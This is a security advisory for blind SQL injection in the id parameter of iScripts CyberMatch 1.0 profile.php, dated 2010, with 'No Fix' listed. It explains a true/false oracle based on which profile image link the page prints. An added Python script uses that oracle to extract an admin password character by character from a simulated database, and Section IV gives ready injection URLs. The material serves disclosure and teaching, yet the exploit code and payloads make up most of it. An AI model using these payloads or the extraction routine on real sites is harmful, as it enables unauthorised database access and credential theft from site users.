iScripts CyberMatch 1.0 Blind SQL Injection Vulnerability
Name               iScripts CyberMatch
Vendor             http://www.iscripts.com
Versions Affected  1.0
Author             Salvatore Fresta aka Drosophila
Website            http://www.salvatorefresta.net
Contact            salvatorefresta [at] gmail [dot] com
Date               2010-02-07
X. INDEX

I.   ABOUT THE APPLICATION
II.  DESCRIPTION
III. ANALYSIS
IV.  SAMPLE CODE
V.   FIX
I. ABOUT THE APPLICATION
iScripts CyberMatch is turnkey online dating software that lets
you start a full-fledged dating site like match.com or eHarmony
in minutes. iScripts CyberMatch can be used to create your own
dating, personals or matchmaking site, adult site or matrimonial
site.
II. DESCRIPTION
The id parameter of profile.php is not properly sanitised before
being used in a SQL query, allowing blind (boolean-based) SQL
injection.
III. ANALYSIS
Summary:
A) Blind SQL Injection
A) Blind SQL Injection
The id parameter in profile.php is not properly sanitised before
being used in a SQL query. The injectable query is not the one
that selects the information about the user identified by id,
but the one that selects the file name of that user's profile
image. The affected query returns five columns.

Because the page never displays the result of that query
directly, the injection is blind: the outcome of an injected
condition has to be inferred from the image link the page prints.
When the injected condition is true, the page prints the real
link to the personal image of the user identified by id; when it
is false, it prints a link to bignophoto.gif.
True condition:
http://site/path/images/profiles/id_random.jpg
False condition:
http://site/path/images/profiles/bignophoto.gif
Successful exploitation requires that "magic_quotes_gpc" is
disabled (the payload needs a literal single quote to break out
of the string) and that the user identified by the id parameter
has uploaded a profile image; for a user without an image the
page prints bignophoto.gif whatever the injected condition, so
there is no true/false signal to read.
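The following Python script is an added example; it is not part of the original advisory and not CyberMatch code. It reproduces the true/false oracle described above against a constructed SQLite stand-in for profile.php (the real schema is unknown, so the profiles and users tables, the password column and the value 's3cr3t!' are invented for the demonstration), then uses that oracle to recover a value character by character, with a binary search on each character's code point. The payloads end in the "-- " comment instead of the advisory's %23 (#) so that they are valid in both MySQL and SQLite; SQLite's unicode()/substr() correspond to MySQL's ASCII()/SUBSTRING(). A parameterised variant of the same query is included to show that the oracle disappears once the id is bound as a value instead of being concatenated.

```python
import sqlite3

NOPHOTO = "http://site/path/images/profiles/bignophoto.gif"


def _db():
    # Constructed schema and data standing in for the unknown CyberMatch
    # database: one profile with an image (id 10), one without (id 11), and a
    # second table holding a value worth extracting through the blind channel.
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE profiles (id INTEGER, image TEXT);
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO profiles VALUES (10, 'id_random.jpg');
        INSERT INTO profiles VALUES (11, NULL);
        INSERT INTO users VALUES ('admin', 's3cr3t!');
    """)
    return con


def _render(row):
    # Page behaviour as the advisory describes it: the real image link when
    # the query returned a file name, bignophoto.gif otherwise.
    if row and row[0]:
        return '<img src="http://site/path/images/profiles/%s">' % row[0]
    return '<img src="%s">' % NOPHOTO


def vulnerable_page(id_param):
    # The id value is concatenated unescaped into the image-name query, which
    # is the profile.php defect with magic_quotes_gpc off.
    sql = "SELECT image FROM profiles WHERE id='" + id_param + "'"
    return _render(_db().execute(sql).fetchone())


def fixed_page(id_param):
    # Parameterised form: the whole id string is bound as a single value, so
    # attacker-supplied SQL never reaches the parser.
    sql = "SELECT image FROM profiles WHERE id=?"
    return _render(_db().execute(sql, (id_param,)).fetchone())


def extract_string(page, subquery, max_len=64):
    """Recover the scalar result of `subquery` through the true/false oracle.

    Every probe is id=10' AND (<condition>)-- , so the row for user 10 (and
    thus the real image link) comes back only when the condition holds.
    Returns (recovered_value, number_of_requests).
    """
    queries = [0]

    def holds(cond):
        queries[0] += 1
        return "bignophoto.gif" not in page("10' AND (%s)-- " % cond)

    def bsearch(expr, lo, hi):
        # Find the integer value of `expr` in [lo, hi] using only "> mid"
        # tests: log2(hi - lo + 1) requests per value instead of one per
        # candidate.
        while lo < hi:
            mid = (lo + hi) // 2
            if holds("(%s) > %d" % (expr, mid)):
                lo = mid + 1
            else:
                hi = mid
        return lo

    # Length first, then one 7-step search per character over 0..127.
    length = bsearch("length((%s))" % subquery, 0, max_len)
    chars = []
    for pos in range(1, length + 1):
        code = bsearch("unicode(substr((%s), %d, 1))" % (subquery, pos), 0, 127)
        chars.append(chr(code))
    return "".join(chars), queries[0]


# Constructed target value; in MySQL the same idea works against any table
# the web application's database user can read.
ADMIN_PW = "SELECT password FROM users WHERE username='admin'"

if __name__ == "__main__":
    print(vulnerable_page("10' AND 1=1-- "))   # real image link
    print(vulnerable_page("10' AND 1=0-- "))   # bignophoto.gif
    print(vulnerable_page("11' AND 1=1-- "))   # no image: no oracle
    print(extract_string(vulnerable_page, ADMIN_PW))
    print(extract_string(fixed_page, ADMIN_PW))  # nothing leaks
```

Against the vulnerable stand-in the seven-character value comes back in 55 requests (6 for the length, 7 per character); against the parameterised variant every condition reads as false and the routine returns an empty string, which is also what a tester sees when the targeted user has no image, so the id=10' AND 1=1 / 1=0 baseline pair should always be checked before reading anything into the oracle.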
IV. SAMPLE CODE
A) Blind SQL Injection

Column count check (the affected query has five fields):
http://site/path/profile.php?id=10' UNION SELECT 1,2,3,4,5%23

True condition (the real image link is printed):
http://site/path/profile.php?id=10' AND 1=1%23

False condition (the bignophoto.gif link is printed):
http://site/path/profile.php?id=10' AND 1=0%23
V. FIX
No Fix.